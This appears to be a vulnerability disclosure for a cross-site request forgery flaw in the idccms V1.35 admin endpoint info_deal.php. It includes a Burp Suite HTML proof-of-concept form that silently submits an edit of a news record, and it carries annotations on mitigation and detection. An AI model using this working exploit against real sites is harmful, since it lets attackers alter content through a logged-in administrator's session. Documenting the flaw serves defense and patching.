Target: http://idccms.com/ — Version: V1.35

idccms V1.35 was found to contain a Cross-Site Request Forgery (CSRF) vulnerability in the component http://127.0.0.1:80/admin/info_deal.php?mudi=rev&nohrefStr=close.

PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <!--
    Defender's reading of this page:
    it is a plain cross-origin HTML form that POSTs to the idccms admin
    endpoint /admin/info_deal.php?mudi=rev&nohrefStr=close. Because it is a
    normal form submission, the victim's browser sends its own admin session
    cookie with the request (the CSRF premise stated above the PoC). None of
    the hidden fields below carries a session-bound anti-CSRF token; the
    fileRnd* values look like per-upload random names rather than a CSRF
    nonce (confirm against info_deal.php), so the server has nothing that
    ties this request to a form it actually issued.
    Mitigation (server side): emit a per-session or per-form random token in
    every admin form and verify it in info_deal.php before any write; mark
    the admin session cookie SameSite=Lax or Strict; reject state-changing
    requests whose Origin/Referer header is not the site's own origin.
    Detection: log admin POSTs arriving with a missing or foreign
    Origin/Referer header.
  -->
  <body>
  <!-- Cosmetic only: rewrites the address bar to "/" so the PoC page's own URL is not displayed; it does not change the request. -->
  <script>history.pushState('', '', '/')</script>
    <!-- The hidden fields replay a captured edit of the news record dataID=7887; mudi=rev is presumably the update action - confirm against the application. -->
    <form action="http://127.0.0.1:80/admin/info_deal.php?mudi=rev&nohrefStr=close" method="POST">
      <input type="hidden" name="dataID" value="7887" />
			<input type="hidden" name="dataType" value="news" />
			<input type="hidden" name="dataTypeCN" value="%E6%96%87%E7%AB%A0" />
			<input type="hidden" name="dataMode" value="" />
			<input type="hidden" name="dataModeStr" value="" />
			<input type="hidden" name="beforeURL" value="http%3A%2F%2F127.0.0.1%2F" />
			<input type="hidden" name="backURL" value="http%3A%2F%2F127.0.0.1%2Fadmin%2Finfo.php%3Fmudi%3Dmanage%26dataMode%3D%26dataModeStr%3D%26dataType%3Dnews%26dataTypeCN%3D%25E6%2596%2587%25E7%25AB%25A0%26dataType2%3D%26dataID%3D0%26menuID%3D351" />
			<input type="hidden" name="time" value="2024-06-12+22%3A37%3A17" />
			<input type="hidden" name="username" value="" />
			<input type="hidden" name="theme" value="cs1" />
			<input type="hidden" name="source" value="" />
			<input type="hidden" name="sourceItem" value="" />
			<input type="hidden" name="writer" value="%E7%BD%91%E9%92%9BIDC" />
			<input type="hidden" name="writerItem" value="%E7%BD%91%E9%92%9BIDC" />
			<input type="hidden" name="webURL" value="" />
			<input type="hidden" name="typeStr" value="announ" />
			<input type="hidden" name="typeStrFindStr" value="%E6%A8%A1%E7%B3%8A%E6%9F%A5%E6%89%BE" />
			<input type="hidden" name="oldTabID" value="1" />
			<input type="hidden" name="tabID" value="1" />
			<!-- The "content" value is the test text "cs" followed by URL-encoded div markup that appears to be browser-extension residue captured with the form; incidental to the CSRF itself. -->
			<input type="hidden" name="content" value="cs%0D%0A%3Cdiv+id%3D%22translatorExtensionContainer%22+class%3D%22translatorExtension%22+style%3D%22display%3Anone%3B%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22translatorExtension%22+style%3D%22position%3Afixed%3Bdisplay%3Aflex%3Bjustify-content%3Acenter%3Bbottom%3A-40vh%3Bleft%3A0px%3Bright%3A0px%3Bmargin%3A0px+auto%3Bwidth%3A100%25%3Btransition%3A80ms%3Bvisibility%3Ahidden%3B%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+id%3D%22translatorExtensionContainer%22+class%3D%22translatorExtension%22%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22translatorExtension%22+style%3D%22position%3Afixed%3Bdisplay%3Aflex%3Bjustify-content%3Acenter%3Bbottom%3A-40vh%3Bleft%3A0px%3Bright%3A0px%3Bmargin%3A0px+auto%3Bwidth%3A100%25%3Btransition%3A80ms%3Bvisibility%3Ahidden%3B%22%3E%0D%0A%3C%2Fdiv%3E" />
			<input type="hidden" name="imgDir" value="upFiles%2FinfoImg%2F" />
			<input type="hidden" name="imgAdminDir" value="..%2FupFiles%2FinfoImg%2F" />
			<input type="hidden" name="upImgStr" value="%7C%7C" />
			<input type="hidden" name="pageNum" value="0" />
			<input type="hidden" name="themeKey" value="" />
			<input type="hidden" name="contentKey" value="cs..." />
			<input type="hidden" name="isAudit" value="1" />
			<input type="hidden" name="isNew" value="1" />
			<input type="hidden" name="img" value="" />
			<input type="hidden" name="fileNum" value="0" />
			<!-- fileRnd1..fileRnd9 are short random-looking strings paired with empty file slots; presumably upload placeholders, not a CSRF token - verify in info_deal.php. -->
			<input type="hidden" name="fileRnd1" value="E54rP" />
			<input type="hidden" name="file1" value="" />
			<input type="hidden" name="fileName1" value="" />
			<input type="hidden" name="filePwd1" value="" />
			<input type="hidden" name="fileRnd2" value="8hPF9" />
			<input type="hidden" name="file2" value="" />
			<input type="hidden" name="fileName2" value="" />
			<input type="hidden" name="filePwd2" value="" />
			<input type="hidden" name="fileRnd3" value="JwB2F" />
			<input type="hidden" name="file3" value="" />
			<input type="hidden" name="fileName3" value="" />
			<input type="hidden" name="filePwd3" value="" />
			<input type="hidden" name="fileRnd4" value="ipqWv" />
			<input type="hidden" name="file4" value="" />
			<input type="hidden" name="fileName4" value="" />
			<input type="hidden" name="filePwd4" value="" />
			<input type="hidden" name="fileRnd5" value="qvgEP" />
			<input type="hidden" name="file5" value="" />
			<input type="hidden" name="fileName5" value="" />
			<input type="hidden" name="filePwd5" value="" />
			<input type="hidden" name="fileRnd6" value="bDJsB" />
			<input type="hidden" name="file6" value="" />
			<input type="hidden" name="fileName6" value="" />
			<input type="hidden" name="filePwd6" value="" />
			<input type="hidden" name="fileRnd7" value="2dyS6" />
			<input type="hidden" name="file7" value="" />
			<input type="hidden" name="fileName7" value="" />
			<input type="hidden" name="filePwd7" value="" />
			<input type="hidden" name="fileRnd8" value="KnlIr" />
			<input type="hidden" name="file8" value="" />
			<input type="hidden" name="fileName8" value="" />
			<input type="hidden" name="filePwd8" value="" />
			<input type="hidden" name="fileRnd9" value="dBJlw" />
			<input type="hidden" name="file9" value="" />
			<input type="hidden" name="fileName9" value="" />
			<input type="hidden" name="filePwd9" value="" />
			<input type="hidden" name="topAddiID" value="0" />
			<input type="hidden" name="addiID" value="0" />
			<input type="hidden" name="voteMode" value="1" />
			<input type="hidden" name="voteItem1" value="0" />
			<input type="hidden" name="voteItem2" value="0" />
			<input type="hidden" name="voteItem3" value="0" />
			<input type="hidden" name="voteItem4" value="0" />
			<input type="hidden" name="voteItem5" value="0" />
			<input type="hidden" name="voteItem6" value="0" />
			<input type="hidden" name="voteItem7" value="0" />
			<input type="hidden" name="voteItem8" value="0" />
			<input type="hidden" name="voteItem11" value="0" />
			<input type="hidden" name="voteItem12" value="0" />
			<input type="hidden" name="isMarkNews" value="1" />
			<input type="hidden" name="isReply" value="1" />
			<input type="hidden" name="readNum" value="111" />
			<!-- state / wapState / isAudit / isNew are the publication flags the request would set; the exact meaning of each value is not shown here - confirm in the application. -->
			<input type="hidden" name="state" value="1" />
			<input type="hidden" name="wapState" value="1" />
			<input type="hidden" name="score1" value="0" />
			<input type="hidden" name="score2" value="0" />
			<input type="hidden" name="score3" value="0" />
			<input type="hidden" name="userLevel" value="0" />
			<input type="hidden" name="userLevelStr" value="" />
			<input type="hidden" name="cutScore1" value="0" />
			<input type="hidden" name="cutScore2" value="0" />
			<input type="hidden" name="cutScore3" value="0" />
			<input type="hidden" name="prevNewsId" value="0" />
			<input type="hidden" name="nextNewsId" value="0" />
			<!-- x / y are the click coordinates of the original image-type submit button, captured along with the rest of the form. -->
			<input type="hidden" name="x" value="61" />
			<input type="hidden" name="y" value="6" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>